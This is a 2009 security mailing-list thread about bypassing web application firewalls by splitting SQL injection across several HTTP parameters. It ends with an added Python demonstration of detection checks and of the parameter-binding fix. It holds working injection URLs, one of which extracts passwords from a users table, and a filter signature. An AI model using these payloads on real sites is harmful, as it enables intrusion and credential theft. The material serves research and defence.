[WEB SECURITY] HTTP parameters fragmentation

lavakumar kuppan lavakumar.in at gmail.com
Wed Aug 19 13:02:17 EDT 2009


Hi Dmitriy,

That is very interesting. It very closely resembles the ModSecurity Filter
Bypass that I had discovered some time back.
There is just one small difference: I was using the same parameter multiple
times (HTTP Parameter Pollution) while you are using multiple parameters.
Nice trick!

I had written a whitepaper on the same, you can find it at
http://lavakumar.com/Split_and_Join.pdf
The ModSecurity advisory is at http://lavakumar.com/modsecurity_hpp.txt

You can find more information about HPP at
http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf

Hope this helps.

Cheers,
Lava
http://www.lavakumar.com


2009/8/19 Dmitriy Evteev <devteev at ptsecurity.com>:
> While preparing an article about WAF bypassing methods, I found an
> interesting way to bypass filters via HTTP parameters fragmentation.
>
>
>
> Vulnerable code example
>
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
>
>
>
> The following request does not allow an attack to be conducted:
>
> index.php?a=1+union+select+1,2/*
>
>
>
> The following request succeeds using HPF:
>
> index.php?a=1+union/*&b=*/select+1,2
>
>
>
> In this case, the SQL request looks like:
>
> select * from table where a=1 union/* and b=*/select 1,2
>
>
>
> Another example:
>
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);
>
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." order by ".$_GET['c']." limit 1");
>
>
>
> Using HPF (HTTP Parameter Fragmentation), the request succeeds:
>
> index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--
>
>
>
> The question is: is there any name for the technique? Please, advise me if
> you know articles or experts in the field (for example, I found a reference in
> http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf,
> page 79).
>
> Thank you for help and cooperation in advance!
>
>
>
> - - - - - - - - - - - - - - -
> Best Regards, Dmitry Evteev
> Positive Technologies Co.
> Tel.: (495) 744-0144
> Web: http://www.ptsecurity.ru
>
>
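
The fragmentation described in the quoted message, as an added example that is not part of the original thread: it runs the two requests from the post through a per-parameter signature check and a joined-value check, then shows that bound parameters keep the fragments as data. The `SIGNATURE` regex, the function names, the `items` table and the use of SQLite in place of the post's PHP `Query()` call are assumptions made for the illustration.

```python
import re
import sqlite3
from urllib.parse import parse_qsl

# Constructed stand-in for one WAF signature; production rule sets are larger.
SIGNATURE = re.compile(r"union\s+select", re.IGNORECASE)

def per_parameter_hit(query_string):
    """Per-argument inspection: each value is matched on its own."""
    return any(SIGNATURE.search(v) for _, v in parse_qsl(query_string))

def joined_hit(query_string):
    """Heuristic: join values in request order, drop /*...*/ comments, then match."""
    joined = " ".join(v for _, v in parse_qsl(query_string))
    return bool(SIGNATURE.search(re.sub(r"/\*.*?\*/", " ", joined, flags=re.S)))

def make_db():
    """Constructed in-memory schema; 'items' stands in for the post's 'table'."""
    db = sqlite3.connect(":memory:")
    db.execute("create table items (a, b)")
    db.execute("insert into items values (1, 5)")
    return db

def concatenated_rows(db, query_string):
    """The pattern from the post: values pasted straight into the SQL text."""
    p = dict(parse_qsl(query_string))
    sql = "select * from items where a=" + p["a"] + " and b=" + p["b"]
    return sorted(db.execute(sql).fetchall())

def bound_rows(db, query_string):
    """Mitigation: placeholders keep every value as data, whatever it contains."""
    p = dict(parse_qsl(query_string))
    sql = "select * from items where a=? and b=?"
    return db.execute(sql, (p["a"], p["b"])).fetchall()

if __name__ == "__main__":
    single = "a=1+union+select+1,2/*"      # request from the post, one parameter
    split = "a=1+union/*&b=*/select+1,2"   # request from the post, fragmented
    db = make_db()
    for qs in (single, split):
        print(qs, per_parameter_hit(qs), joined_hit(qs))
    print(concatenated_rows(db, split))    # the injected row is returned
    print(bound_rows(db, split))           # no rows: fragments compared as strings
```

The joined-value check is only a heuristic, since a filter in front of the application does not know how the application orders its parameters in the query; binding the values removes the dependency on the filter altogether.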